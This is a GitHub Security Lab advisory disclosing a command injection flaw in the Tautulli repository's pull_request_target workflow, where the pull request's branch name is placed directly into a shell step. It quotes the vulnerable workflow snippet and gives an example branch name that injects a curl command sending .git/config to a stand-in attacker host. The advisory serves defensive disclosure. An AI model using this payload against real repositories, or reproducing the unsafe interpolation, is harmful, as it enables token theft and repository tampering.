GHSL-2021-016: Unauthorized repository modification or secrets exfiltration in a GitHub workflow of Tautulli

Coordinated Disclosure Timeline

• 2021-01-18: Issue reported to maintainers
• 2021-01-18: Issue acknowledged
• 2021-01-18: Issue fixed

Summary

The pull-requests.yml GitHub workflow is vulnerable to unauthorized modification of the base repository or secrets exfiltration from a Pull Request.

Product

Tautulli/Tautulli repository

Tested Version

The latest changeset of pull-requests.yml to the date.

Details

Issue: A branch name from the pull request is used to format a shell command

Please notice that the vulnerability exists in multiple branches as pull_request_target workflow runs from the branch the pull request was done to.

on:
  pull_request_target:
    types: [opened, synchronize, edited, reopened]
...
      - name: Fail Workflow
        if: github.base_ref != 'nightly'
        run: |
          echo Base: ${{ github.base_ref }}
          echo Head: ${{ github.head_ref }}
          exit 1

Impact

This vulnerability allows for arbitrary command injection into the bash script which allows for unauthorized modification of the base repository and secrets exfiltration. For example a PR from branch named a;${IFS}curl${IFS}-d${IFS}@.git/config${IFS}evil.com${IFS}# would exfiltrate the repository token to the attacker controlled server.

Credit

This issue was discovered and reported by GHSL team member @JarLob (Jaroslav Lobačevski).

Contact

You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2021-016 in any communication regarding this issue.